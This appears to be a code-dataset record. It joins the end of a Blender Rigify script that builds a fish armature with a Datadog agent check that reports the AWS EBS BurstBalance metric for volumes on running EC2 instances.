bones['spine.001'] = bone.name
bone = arm.edit_bones.new('back_fin.T.Bk')
bone.head[:] = 0.0000, 1.2501, 0.5345
bone.tail[:] = 0.0000, 1.5211, 0.7594
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['back_fin.T.Bk'] = bone.name
bone = arm.edit_bones.new('back_fin.B.Bk')
bone.head[:] = 0.0000, 1.2305, 0.4158
bone.tail[:] = 0.0000, 1.3289, 0.2452
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['back_fin.B.Bk'] = bone.name
bone = arm.edit_bones.new('spine.002')
bone.head[:] = -0.0000, 0.7152, 0.4305
bone.tail[:] = -0.0000, 0.3182, 0.4031
bone.roll = -0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.001']]
bones['spine.002'] = bone.name
bone = arm.edit_bones.new('mid_fin.Top')
bone.head[:] = 0.0000, 0.7296, 0.5396
bone.tail[:] = 0.0000, 0.7709, 0.6351
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.001']]
bones['mid_fin.Top'] = bone.name
bone = arm.edit_bones.new('mid_fin.Bot')
bone.head[:] = 0.0000, 0.7296, 0.3505
bone.tail[:] = 0.0000, 0.8233, 0.2684
bone.roll = 1.5708
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.001']]
bones['mid_fin.Bot'] = bone.name
bone = arm.edit_bones.new('back_fin.T.001.Bk')
bone.head[:] = 0.0000, 1.5211, 0.7594
bone.tail[:] = 0.0000, 1.7667, 0.9633
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['back_fin.T.Bk']]
bones['back_fin.T.001.Bk'] = bone.name
bone = arm.edit_bones.new('back_fin.B.001.Bk')
bone.head[:] = 0.0000, 1.3289, 0.2452
bone.tail[:] = 0.0000, 1.3818, 0.1513
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['back_fin.B.Bk']]
bones['back_fin.B.001.Bk'] = bone.name
bone = arm.edit_bones.new('spine.003')
bone.head[:] = -0.0000, 0.3182, 0.4031
bone.tail[:] = -0.0000, 0.0152, 0.3904
bone.roll = 0.0001
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.002']]
bones['spine.003'] = bone.name
bone = arm.edit_bones.new('back_fin.T.002.Bk')
bone.head[:] = 0.0000, 1.7667, 0.9633
bone.tail[:] = 0.0000, 1.9489, 1.1145
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['back_fin.T.001.Bk']]
bones['back_fin.T.002.Bk'] = bone.name
bone = arm.edit_bones.new('spine.008')
bone.head[:] = -0.0000, 0.0152, 0.3904
bone.tail[:] = 0.0000, -0.3259, 0.3967
bone.roll = 0.0001
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.003']]
bones['spine.008'] = bone.name
bone = arm.edit_bones.new('spine.004')
bone.head[:] = 0.0000, -0.3259, 0.3967
bone.tail[:] = 0.0000, -0.5947, 0.4044
bone.roll = -0.0001
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.008']]
bones['spine.004'] = bone.name
bone = arm.edit_bones.new('chest_fin.Bot.L')
bone.head[:] = 0.0889, 0.2605, 0.2866
bone.tail[:] = 0.1731, 0.3299, 0.1901
bone.roll = -2.3171
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.008']]
bones['chest_fin.Bot.L'] = bone.name
bone = arm.edit_bones.new('chest_fin.Bot.R')
bone.head[:] = -0.0889, 0.2605, 0.2866
bone.tail[:] = -0.1731, 0.3299, 0.1901
bone.roll = 2.3171
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.008']]
bones['chest_fin.Bot.R'] = bone.name
bone = arm.edit_bones.new('spine.005')
bone.head[:] = 0.0000, -0.5947, 0.4044
bone.tail[:] = 0.0000, -1.2084, 0.4328
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.004']]
bones['spine.005'] = bone.name
bone = arm.edit_bones.new('top_fin')
bone.head[:] = 0.0000, -0.2777, 0.5550
bone.tail[:] = 0.0000, -0.1962, 0.7053
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.004']]
bones['top_fin'] = bone.name
bone = arm.edit_bones.new('spine.006')
bone.head[:] = 0.0000, -1.2084, 0.4328
bone.tail[:] = 0.0000, -1.5634, 0.4275
bone.roll = -0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.005']]
bones['spine.006'] = bone.name
bone = arm.edit_bones.new('shoulder.L')
bone.head[:] = 0.0729, -0.9648, 0.3756
bone.tail[:] = 0.2649, -0.9648, 0.3157
bone.roll = 3.4558
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['shoulder.L'] = bone.name
bone = arm.edit_bones.new('shoulder.R')
bone.head[:] = -0.0729, -0.9648, 0.3756
bone.tail[:] = -0.2649, -0.9648, 0.3157
bone.roll = -3.4558
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['shoulder.R'] = bone.name
bone = arm.edit_bones.new('top_fin.001')
bone.head[:] = 0.0000, -0.1962, 0.7053
bone.tail[:] = 0.0000, -0.1362, 0.8158
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['top_fin']]
bones['top_fin.001'] = bone.name
bone = arm.edit_bones.new('spine.007')
bone.head[:] = 0.0000, -1.5634, 0.4275
bone.tail[:] = 0.0000, -2.0661, 0.4364
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.006']]
bones['spine.007'] = bone.name
bone = arm.edit_bones.new('side_fin.L')
bone.head[:] = 0.2140, -0.9624, 0.2213
bone.tail[:] = 0.5220, -0.9078, -0.1343
bone.roll = -2.3170
bone.use_connect = False
bone.parent = arm.edit_bones[bones['shoulder.L']]
bones['side_fin.L'] = bone.name
bone = arm.edit_bones.new('side_fin.R')
bone.head[:] = -0.2140, -0.9624, 0.2213
bone.tail[:] = -0.5220, -0.9078, -0.1343
bone.roll = 2.3170
bone.use_connect = False
bone.parent = arm.edit_bones[bones['shoulder.R']]
bones['side_fin.R'] = bone.name
bone = arm.edit_bones.new('eye.L')
bone.head[:] = 0.1405, -1.6860, 0.4161
bone.tail[:] = 0.3684, -1.6810, 0.4156
bone.roll = 3.1352
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.007']]
bones['eye.L'] = bone.name
bone = arm.edit_bones.new('eye.R')
bone.head[:] = -0.1405, -1.6860, 0.4161
bone.tail[:] = -0.3684, -1.6810, 0.4156
bone.roll = -3.1352
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.007']]
bones['eye.R'] = bone.name
bone = arm.edit_bones.new('jaw.master')
bone.head[:] = -0.0000, -1.5791, 0.2788
bone.tail[:] = 0.0000, -1.9421, 0.3386
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.007']]
bones['jaw.master'] = bone.name
bone = arm.edit_bones.new('side_fin.L.001')
bone.head[:] = 0.5220, -0.9078, -0.1343
bone.tail[:] = 0.7928, -0.7598, -0.4802
bone.roll = -2.2826
bone.use_connect = True
bone.parent = arm.edit_bones[bones['side_fin.L']]
bones['side_fin.L.001'] = bone.name
bone = arm.edit_bones.new('side_fin.R.001')
bone.head[:] = -0.5220, -0.9078, -0.1343
bone.tail[:] = -0.7928, -0.7598, -0.4802
bone.roll = 2.2826
bone.use_connect = True
bone.parent = arm.edit_bones[bones['side_fin.R']]
bones['side_fin.R.001'] = bone.name
bone = arm.edit_bones.new('jaw')
bone.head[:] = -0.0000, -1.5791, 0.2788
bone.tail[:] = 0.0000, -1.7326, 0.3041
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['jaw.master']]
bones['jaw'] = bone.name
bone = arm.edit_bones.new('jaw.002.L')
bone.head[:] = 0.0891, -1.5791, 0.2894
bone.tail[:] = 0.1110, -1.7198, 0.3129
bone.roll = 1.4894
bone.use_connect = False
bone.parent = arm.edit_bones[bones['jaw.master']]
bones['jaw.002.L'] = bone.name
bone = arm.edit_bones.new('jaw.002.R')
bone.head[:] = -0.0891, -1.5791, 0.2894
bone.tail[:] = -0.1110, -1.7198, 0.3129
bone.roll = -1.4894
bone.use_connect = False
bone.parent = arm.edit_bones[bones['jaw.master']]
bones['jaw.002.R'] = bone.name
bone = arm.edit_bones.new('jaw.001')
bone.head[:] = 0.0000, -1.7326, 0.3041
bone.tail[:] = 0.0000, -1.8860, 0.3294
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw']]
bones['jaw.001'] = bone.name
bone = arm.edit_bones.new('jaw.003.L')
bone.head[:] = 0.1110, -1.7198, 0.3129
bone.tail[:] = 0.1260, -1.8159, 0.3326
bone.roll = 1.2807
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.002.L']]
bones['jaw.003.L'] = bone.name
bone = arm.edit_bones.new('jaw.003.R')
bone.head[:] = -0.1110, -1.7198, 0.3129
bone.tail[:] = -0.1260, -1.8159, 0.3326
bone.roll = -1.2807
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.002.R']]
bones['jaw.003.R'] = bone.name
bpy.ops.object.mode_set(mode='OBJECT')
pbone = obj.pose.bones[bones['spine']]
pbone.rigify_type = 'spines.super_spine'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.neck_pos = 8
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tail_pos = 3
except AttributeError:
pass
try:
pbone.rigify_parameters.pivot_pos = 5
except AttributeError:
pass
try:
pbone.rigify_parameters.use_tail = True
except AttributeError:
pass
try:
pbone.rigify_parameters.copy_rotation_axes = [True, False, True]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['back_fin.T.Bk']]
pbone.rigify_type = 'limbs.super_finger'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.primary_rotation_axis = "Z"
except AttributeError:
pass
pbone = obj.pose.bones[bones['back_fin.B.Bk']]
pbone.rigify_type = 'limbs.super_finger'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.primary_rotation_axis = "Z"
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['mid_fin.Top']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['mid_fin.Bot']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['back_fin.T.001.Bk']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['back_fin.B.001.Bk']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['back_fin.T.002.Bk']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.008']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['chest_fin.Bot.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['chest_fin.Bot.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.005']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['top_fin']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.006']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shoulder.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['shoulder.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['top_fin.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.007']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['side_fin.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.copy_rotation_axes = [True, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['side_fin.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.copy_rotation_axes = [True, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['eye.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['eye.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.master']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
try:
pbone.rigify_parameters.make_deform = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['side_fin.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['side_fin.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.002.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.002.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.003.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.003.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
bpy.ops.object.mode_set(mode='EDIT')
for bone in arm.edit_bones:
bone.select = False
bone.select_head = False
bone.select_tail = False
for b in bones:
bone = arm.edit_bones[bones[b]]
bone.select = True
bone.select_head = True
bone.select_tail = True
arm.edit_bones.active = bone
arm.layers = [(x in [0, 3, 5, 6, 8, 10]) for x in range(32)]
if __name__ == "__main__":
create(bpy.context.active_object) | 39,529 | 0 | 23 |
ea03b83c85944b32b18ad7b834263f15f47ad00f | 2,512 | py | Python | checks.d/aws_ebs_burst_balance.py | mounemoi/datadog-aws-burst-balance | 58c261b69d23185e5a08f19e7d2ce4e43f950121 | [
"MIT"
] | null | null | null | checks.d/aws_ebs_burst_balance.py | mounemoi/datadog-aws-burst-balance | 58c261b69d23185e5a08f19e7d2ce4e43f950121 | [
"MIT"
] | null | null | null | checks.d/aws_ebs_burst_balance.py | mounemoi/datadog-aws-burst-balance | 58c261b69d23185e5a08f19e7d2ce4e43f950121 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from checks import AgentCheck
from boto3.session import Session
import datetime
| 36.941176 | 102 | 0.480096 | # -*- coding: utf-8 -*-
from checks import AgentCheck
from boto3.session import Session
import datetime
class EBSBurstBalance(AgentCheck):
    """Datadog agent check reporting the EBS ``BurstBalance`` CloudWatch metric.

    For every EBS volume attached to a running EC2 instance in the configured
    region, the check reads the minimum ``BurstBalance`` over the last 30
    minutes and submits the most recent datapoint as a gauge, tagged with the
    owning instance's Name tag and the volume id.
    """

    def check(self, config):
        """Run one collection cycle.

        Args:
            config: instance config dict; must contain a ``region`` key naming
                the AWS region to query. Missing region is logged and the run
                is aborted.
        """
        if 'region' not in config:
            self.log.error('no region')
            return
        session = Session(region_name=config['region'])
        ec2 = session.client('ec2')

        # Enumerate every EBS volume attached to a running instance, paging
        # through DescribeInstances manually via NextToken.
        volumes = []
        token = ''
        while True:
            page = ec2.describe_instances(
                Filters=[
                    { 'Name': 'instance-state-name', 'Values': ['running'] },
                ],
                MaxResults=100,
                NextToken=token,
            )
            for reservation in page['Reservations']:
                for inst in reservation['Instances']:
                    # Pick up the instance's Name tag (empty if untagged).
                    name = ''
                    for tag in inst.get('Tags', []):
                        if tag['Key'] == 'Name':
                            name = tag['Value']
                            break
                    for mapping in inst.get('BlockDeviceMappings', []):
                        volumes.append({ 'name': name, 'volume_id': mapping['Ebs']['VolumeId'] })
            if 'NextToken' not in page:
                break
            token = page['NextToken']

        # Fetch the BurstBalance statistics for each discovered volume and
        # report the newest 5-minute minimum as a gauge.
        cloudwatch = session.client('cloudwatch')
        for vol in volumes:
            stats = cloudwatch.get_metric_statistics(
                Namespace='AWS/EBS',
                MetricName='BurstBalance',
                Dimensions=[ { 'Name': 'VolumeId', 'Value': vol['volume_id'] } ],
                StartTime=datetime.datetime.utcnow() - datetime.timedelta(minutes=30),
                EndTime=datetime.datetime.utcnow(),
                Period=300,
                Statistics=[ 'Minimum' ],
                Unit='Percent',
            )
            datapoints = stats['Datapoints']
            if datapoints:
                newest = max(datapoints, key=lambda point: point['Timestamp'])
                self.gauge(
                    self.init_config.get('metrics_name', 'aws.ebs.burst_balance'),
                    newest['Minimum'],
                    tags=[ 'ae-name:{name}'.format(**vol), 'ae-volume-id:{volume_id}'.format(**vol) ],
                )
            else:
                self.log.info('{name} : {volume_id} : failure to get'.format(**vol))
| 2,345 | 13 | 49 |
